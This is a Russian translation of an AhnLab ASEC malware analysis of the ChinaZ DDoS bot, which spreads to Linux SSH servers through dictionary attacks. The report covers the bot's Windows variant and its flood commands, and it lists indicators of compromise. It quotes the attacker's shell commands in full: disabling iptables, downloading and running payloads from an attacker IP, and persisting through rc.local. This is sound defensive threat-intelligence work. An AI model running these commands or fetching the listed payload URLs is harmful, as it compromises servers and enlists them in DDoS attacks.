Центр экстренного реагирования AhnLab Security Emergency response Center (ASEC) недавно обнаружил вредоносное ПО ChinaZ DDoS Bot, устанавливаемое на недостаточно управляемые SSH-серверы Linux. Являясь одной из китайских угрожающих групп, впервые обнаруженных около 2014 года, группа ChinaZ устанавливает различные DDoS-боты на системы Windows и Linux. Основные DDoS-боты, предположительно созданные угрожающей группой ChinaZ, включают XorDDoS, AESDDos, BillGates и MrBlack.
ChinaZ DDoS Bot
В то время как настольные среды обычно используются обычными пользователями, серверы предназначены для предоставления специализированных услуг. В связи с этим заражение вредоносным ПО обычно происходит в настольных средах через веб-браузеры или вложения электронной почты. Угрожающие субъекты также распространяют свои вредоносные программы, замаскированные под обычные программы, чтобы обманом заставить пользователей установить их. Однако вышеперечисленные методы имеют ограничения при попытке атаковать серверные среды, поэтому угрожающим субъектам приходится использовать другой подход. Ярким примером этого является использование серверов, которые плохо управляются или открыты для атак на уязвимости, поскольку не были исправлены до последней версии.
Простые учетные данные являются распространенной формой плохо управляемых служб, поскольку они уязвимы для атак по словарю. Например, службы Remote Desktop Protocol (RDP) и MS-SQL являются одним из основных векторов атак на операционные системы Windows. В серверных средах Linux службы Secure Shell (SSH) являются распространенной мишенью, а служба Telnet - мишенью для атак по словарю в старых серверах Linux или в средах IoT, где установлена встроенная ОС Linux.
Предполагается, что DDoSClient группы угроз ChinaZ, о котором пойдет речь в этой статье, был установлен с использованием учетных данных, полученных с помощью сканеров и вредоносной программы SSH BruteForce. Скорее всего, группа угроз сканировала порт 22, область, где работают службы SSH, прежде чем найти активную службу SSH и выполнить атаку по словарю, используя общепринятые учетные данные SSH.
После входа в систему группа угроз использовала команду, подобную приведенной ниже, для установки ChinaZ на Linux-сервер. Кроме того, IP-адрес агента угроз, который вошел на SSH-сервер, и адрес, использованный для загрузки ChinaZ, совпадают.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 | service iptables stop wget hxxp://45.113.163[.]219/linux64 nohup /root/linux64 > /dev/null 2>&1 & chmod 777 linux64 ./linux64 chmod 0755 /root/linux64 nohup /root/linux64 > /dev/null 2>&1 & chmod 0777 linux64 chmod u+x linux64 ./linux64 & chmod u+x linux64 ./linux64 & cd /tmp service iptables stop wget hxxp://45.113.163[.]219/linux32 nohup /root/linux32 > /dev/null 2>&1 & chmod 777 linux32 ./164 chmod 0755 /root/linux32 nohup /root/linux32 > /dev/null 2>&1 & chmod 0777 linux32 chmod u+x linux32 ./linux32 & chmod u+x dos6cc4 ./linux32 & cd /tmp echo "cd /root/">>/etc/rc.local echo "./linux64&">>/etc/rc.local echo "./linux32&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local |
Агент угроз отключил iptables (который также является брандмауэром) и использовал wget для установки ChinaZ DDoSClient, который был создан для архитектур x86 и x64. Угрожающий агент вошел в учетную запись root и установил загруженное вредоносное ПО в каталог /root. Установленный позже ChinaZ был запущен и зарегистрирован в rc.local для поддержания устойчивости, чтобы он работал даже после перезагрузки.
ChinaZ может выполнять вредоносные действия, получая команды от субъекта угрозы. Большинство команд, поддерживаемых DDoS-ботом ChinaZ, являются характерными командами DDoS-атак. Поддерживаемые DDoS-атаки включают атаки SYN, UDP, ICMP и DNS Flood.
ChinaZ DDoSClient (Windows)
Хотя он не был обнаружен в атаках на SSH-серверы Linux, ChinaZ в формате PE можно найти даже на VirusTotal в атаках на системы Windows. Поскольку он практически идентичен версии для Linux, в этой заметке мы сосредоточимся на различиях.
ChinaZ для Windows маскируется под именем "Declient", как и Linux-версия. Для этого он копирует себя под именем "Declient.exe" в каталог %SystemRoot% и регистрирует себя на ключ Run, чтобы иметь возможность работать даже после перезагрузки.
Адрес сервера C&C и адрес второго сервера C&C, бэкдор C&C, который запускается через заданный период времени, такие же, как и в предыдущей версии Linux.
Хотя структура LOGININFO, используемая для хранения информации, собранной с зараженной системы, идентична своему аналогу для Linux, в ней есть несколько неиспользуемых элементов. Строка "UST" используется в качестве строки Mark, как и в версии Linux.
Поддерживаемые команды по сути те же, но в меньшем количестве по сравнению с версией для Linux. Команды DDoS-атак одинаковы для всех четырех: SYN, UDP, ICMP и DNS Flood.
Indicators of Compromise
IPv4 Port Combinations
- 45.113.163.219:29134
Domain Port Combinations
- www.911ddos.com:10912
URLs
- http://45.113.163.219/linux32
- http://45.113.163.219/linux64
- http://45.113.163.219/win32
MD5
- 2ec7348e6b6b32d50a01c3ffe480ef70
- c69f5eb555cc10f050375353c205d5fa
- c9eb0815129c135db5bbb8ac79686b9a